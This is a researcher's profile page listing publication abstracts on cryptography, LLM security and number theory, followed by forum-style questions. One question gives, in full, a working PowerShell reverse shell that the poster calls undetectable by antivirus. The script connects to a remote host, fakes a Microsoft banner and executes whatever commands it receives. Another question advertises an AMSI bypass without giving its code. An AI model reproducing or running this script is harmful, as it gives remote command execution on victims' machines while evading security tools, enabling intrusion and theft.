Norbert Tihanyi

Norbert Tihanyi
Eötvös Loránd University · Department of Computer Algebra

PhD

About

53
Publications
18,538
Reads
How we measure 'reads'
A 'read' is counted each time someone views a publication summary (such as the title, abstract, and list of authors), clicks on a figure, or views or downloads the full-text. Learn more
277
Citations
Introduction
Norbert Tihanyi is a Lead Researcher, Artifical Intelligence & Digital Science Research Center (AIDRC) at TII. Norbert interests are in Cryptography, Computer Security and Privacy, as well as in Analytic Number Theory.

Publications

Publications (53)
Article
Full-text available
The field of Natural Language Processing (NLP) is currently undergoing a revolutionary transformation driven by the power of pre-trained Large Language Models (LLMs) based on groundbreaking Transformer architectures. As the frequency and diversity of cybersecurity attacks continue to rise, the importance of incident detection has significantly incr...
Article
Full-text available
Using the computational resources of an untrusted third party to crack a password hash can pose a high number of privacy and security risks. The act of revealing the hash digest could in itself negatively impact both the data subject who created the password, and the data controller who stores the hash digest. This paper solves this currently open...
Article
Full-text available
Despite providing unparalleled connectivity and convenience, the exponential growth of the Internet of Things (IoT) ecosystem has triggered significant cybersecurity concerns. These concerns stem from various factors, including the heterogeneity of IoT devices, widespread deployment, and inherent computational limitations. Integrating emerging tech...
Article
The deployment of the fifth-generation (5G) wireless networks in Internet of Everything (IoE) applications and future networks (e.g., sixth-generation (6G) networks) has raised a number of operational challenges and limitations, for example in terms of security and privacy. Edge learning is an emerging approach to training models across distributed...
Preprint
As machine intelligence evolves, the need to test and compare the problem-solving abilities of different AI models grows. However, current benchmarks are often overly simplistic, allowing models to perform uniformly well, making it difficult to distinguish their capabilities. Additionally, benchmarks typically rely on static question-answer pairs,...
Preprint
Full-text available
Integrating Deep Learning (DL) techniques in the Internet of Vehicles (IoV) introduces many security challenges and issues that require thorough examination. This literature review delves into the inherent vulnerabilities and risks associated with DL in IoV systems, shedding light on the multifaceted nature of security threats. Through an extensive...
Preprint
Full-text available
This paper provides a comprehensive review of the future of cybersecurity through Generative AI and Large Language Models (LLMs). We explore LLM applications across various domains, including hardware design security, intrusion detection, software engineering, design verification, cyber threat intelligence, malware detection, and phishing detection...
Preprint
Full-text available
This study provides a comparative analysis of state-of-the-art large language models (LLMs), analyzing how likely they generate vulnerabilities when writing simple C programs using a neutral zero-shot prompt. We address a significant gap in the literature concerning the security properties of code produced by these models without specific directive...
Chapter
Full-text available
ESBMC implements many state-of-the-art techniques that combine abstract interpretation and model checking. Here, we report on new and improved features that allow us to obtain verification results for previously unsupported programs and properties. ESBMC now employs a new static interval analysis of expressions in programs to increase verification...
Article
Full-text available
Large Language Models (LLMs) excel across various domains, from computer vision to medical diagnostics. However, understanding the diverse landscape of cybersecurity, encompassing cryptography, reverse engineering, and managerial facets like risk assessment, presents a challenge, even for human experts. In this paper, we introduce CyberMetric, a be...
Article
Full-text available
Fifth-generation and Beyond (5GB) networks are transformational technologies to revolutionize future wireless communications in terms of massive connectivity, higher capacity, lower latency, and ultra-high reliability. To this end, 5GB networks are designed as a coalescence of various schemes and enabling technologies such as unmanned aerial vehicl...
Article
Full-text available
In this paper, D(HE)at, a practical denial-of-service (DoS) attack targeting the finite field Diffie–Hellman (DH) key exchange protocol, is presented, allowing remote users to send non-public keys to the victim, triggering expensive server-side DH modular-exponentiation calculations. The attack was disclosed in November 2021 with an assigned CVE-20...
Article
Numbers of the form \(k\cdot p^n+1\) with the restriction \(k < p^n\) are called generalized Proth numbers. For a fixed prime p we denote them by \(\mathcal{T}_p\). The underlying structure of \(\mathcal{T}_2\) (Proth numbers) was investigated in [2]. In this paper the authors extend their results to all primes. An efficiently computable upper boun...
Preprint
Full-text available
Software vulnerabilities leading to various detriments such as crashes, data loss, and security breaches, significantly hinder the quality, affecting the market adoption of software applications and systems. Although traditional methods such as automated software testing, fault localization, and repair have been intensively studied, static analysis...
Preprint
Full-text available
This paper presents the FormAI dataset, a large collection of 112,000 AI-generated compilable and independent C programs with vulnerability classification. We introduce a dynamic zero-shot prompting technique, constructed to spawn a diverse set of programs utilizing Large Language Models (LLMs). The dataset is generated by GPT-3.5-turbo and compris...
Preprint
Full-text available
Natural Language Processing (NLP) domain is experiencing a revolution due to the capabilities of Pre-trained Large Language Models ( LLMs), fueled by ground-breaking Transformers architecture, resulting into unprecedented advancements. Their exceptional aptitude for assessing probability distributions of text sequences is the primary catalyst for o...
Preprint
Full-text available
The ongoing deployment of the fifth generation (5G) wireless networks constantly reveals limitations concerning its original concept as a key driver of Internet of Everything (IoE) applications. These 5G challenges are behind worldwide efforts to enable future networks, such as sixth generation (6G) networks, to efficiently support sophisticated ap...
Preprint
Full-text available
Using the computational resources of an untrusted third party to crack a password hash can pose a high number of privacy and security risks. The act of revealing the hash digest could in itself negatively impact both the data subject who created the password, and the data controller who stores the hash digest. This paper solves this currently open...
Article
Full-text available
Random numbers are very important in many fields of computer science. Generating high-quality random numbers using only basic arithmetic operations is challenging, especially for devices with limited hardware capabilities, such as Internet of Things (IoT) devices. In this paper, we present a novel pseudorandom number generator, the simple chain aut...
Preprint
Full-text available
In this paper we present a novel solution that combines the capabilities of Large Language Models (LLMs) with Formal Verification strategies to verify and automatically repair software vulnerabilities. Initially, we employ Bounded Model Checking (BMC) to locate the software vulnerability and derive a counterexample. The counterexample provides evid...
Article
Full-text available
Computing the reciprocal sum of sparse integer sequences with tight upper and lower bounds is far from trivial. In the case of Carmichael numbers or twin primes even the first decimal digit is unknown. For accurate bounds the exact structure of the sequences needs to be unfolded. In this paper we present explicit bounds for the sum of reciprocals o...
Article
Full-text available
Fixed points can be defined as $\mathcal {E}_{K}(P)=P$ for a key $K$ and plaintext $P$ where $\mathcal {E}$ is the encryption function. For the Data Encryption Standard (DES) algorithm there are four weak keys, such that $\mathcal {E}_{K}(\mathcal {E}_{K}(P))=P$ for all $P$ . For each weak key there are 2 <sup xmlns:mml="http://www.w3.o...
Conference Paper
Full-text available
In this paper a new type of application layer attack against complex IoT environments is presented which is based on unsafe typecasting and loose comparisons. We describe the concept of magic hashes and explain why they are relevant in IoT platforms from a security point of view. We focus our efforts on lightweight cryptographic hash functions whic...
Presentation
Full-text available
High-quality random numbers are important in many fields of computer science. Truncating the output of a random number generator's step is a common technique to enhance the security of generators. Linear Congruential Generators (LCG) with truncated output when only some bits are observable by an adversary was first considered by Knuth. These type o...
Conference Paper
Full-text available
This paper is devoted to propose a novel PRNG based on compositions (temporal products of special Gluskov products) of abstract automata. Its utility shall be shown through a simple example. However, several questions are subject of future work, such as the analysis of further properties of the PRNG, as well as related statistical testing.
Article
In this paper we discuss NIST test results of a previously introduced cryptosystem based on automata compositions. We conclude that the requirements of NIST test are all fulfilled by the cryptosystem.
Thesis
Full-text available
In this PhD thesis we present an efficient algorithm called RS-PEAK which can be used to find extremely large values of the Riemann zeta function on the critical line. Locating peak values of the zeta function is a promising method for getting a better understanding of the distribution of prime numbers. We investigated multidimensional approximatio...
Conference Paper
Full-text available
The paper summarizes the computation results ofthe Riemann Zeta Search Project. The aim of the project was to find extremely large values of the Riemann zeta function on the critical line. The computing method is based on the RS-PEAK algorithm which was presented in the 16th SYNASC conference in 2014. The computation environment was served by the S...
Article
Full-text available
In this paper we present some improvements of finding large values of the Riemann-Siegel function Z(t). In order to analyse Z(t) the authors developed a function F (t) which shows in some aspect similar characteristics to Z(t) but easier to compute.
Article
Full-text available
The paper summarizes the computation results pursuing peak values of the Riemann zeta function. The computing method is based on the RS-Peak algorithm by which we are able to solve simultaneous Diophantine approximation problems efficiently. The computation environment was served by the SZTAKI Desktop Grid operated by the Laboratory of Parallel and...
Article
Full-text available
In this paper we shall use some standard statistical methods to test the avalanche effect of a previously introduced cryptosystem based on automata compositions, called DH1 cryptosystem. We have generated sample data of encryption and decryption. In our first set of analysis we simply estimated the probabilities of the atoms of the discrete distrib...
Conference Paper
Full-text available
In this paper we discuss on NIST test results of a previously introduced cryptosystem based on automata compositions. Our conclusions based on the statistics confirm that the re- quirements of NIST test are fulfilled.
Conference Paper
Full-text available
In this paper we present a regression based analyses of cleartext passwords moving towards an efficient password cracking methodology. Hundreds of available databases were examined and it was observed that they had similar behavior regardless of their size: password length distribution, entropy, letter frequencies form similar characteristics in ea...
Presentation
Full-text available
Random numbers are very important in many fields of computer science, especially in cryptography. One of the most important usages of pseudorandom number generators (PRNG) is key generation methods for cryptographic purposes. In this presentation a modification of the prime generation method of the OpenSSL library will be presented. The modified ve...
Article
Full-text available
The main aim of this paper is to present the concept of fault-injection backdoors in Random Number Generators. Backdoors can be activated by fault-injection techniques. Presented algorithms can be used in embedded systems like smart-cards and hardware security modules in order to implement subliminal channels in random number generators.
Article
Full-text available
In this paper we present the Multithreaded Advanced Fast Rational Approximation algorithm – MAFRA – for solving n-dimensional simultaneous Diophantine approximation problems. We show that in some particular applications the Lenstra-Lenstra-Lovasz (L3) algorithm can be substituted by the presented one in order to reduce their practical running time....
Conference Paper
Full-text available
In this paper a new algorithm RS-PEAK will be presented for locating peak values of the Riemann zeta function on the critical line. The method based on earlier results of Andrew M. Odlyzko, Tadej Kotnik, and on a recently achieved results of solving simultaneous Diophantine approximation problems. Until 2014 only a few hundred values were known whe...
Book
Full-text available
Matematikai modellek komputeralgebrai támogatással
Book
Full-text available
Biztonsági tesztelés a gyakorlatban - elektronikus tankönyv
Conference Paper
Full-text available
In this paper we introduce the concept of side-channel kleptography. Methods will be presented how to hide backdoors to Pseudo Random Number Generators. Backdoors can be activated by side-channel attacks. Presented algorithms can be used in embedded systems like smart-cards and hardware security modules in order to implement subliminal channels in...
Article
Full-text available
In this paper two different password databases are compared. Both of them had only Hungarian human-generated passwords. The first database contained user passwords relating to the authorization mechanism of online banking transactions, while the second one contained passwords relating to the authorization of opening newsletters. The first aim of th...
Article
Full-text available
In this paper we consider two algorithmic problems of simultaneous Diophantine approximations. The first algorithm produces a full solution set for approximating an irrational number with rationals with common denominators from a given interval. The second one aims at finding as many simultaneous solutions as possible in a given time unit. All the...

Questions

Questions (6)
Question
I just published an undetectable powershell Reverseshell script based on the original Nishang Framework. Any new ideas to improve are welcome.
-----------------------PS script-------------------------
#Twitter: @TihanyiNorbert (No AV detecetion 2021 october)
#Based on the original nishang Framework written by @nikhil_mitt.
$c = New-Object System.Net.Sockets.TCPClient($args[0],$args[1]);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.`n`n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()
-----------------------PS script-------------------------
Question
Which is your favorite IoT security related article?
We just published an interesting article regarding to "IoT magic hashes".
"The Theory and Practice of Magic Hash Based Attacks on Lightweight Cryptographic Hash Functions in Complex IoT Environments"
Any comments and new ideas are welcome.
Norbert
Question
Antimalware Scan Interface (AMSI) is very popular to detect malicious scripts. Here is my NEW fully undetectable AMSI bypass script based on Matt Graeber 'amsiInitFailed' script. With a little math 0/57 AV detects as malicious in 2021.
Question
There are many outstanding articles written in the last 20 years in Number Theory. What do you think what is the most interesting and groundbreaking article in Number Theory?

Network

Cited By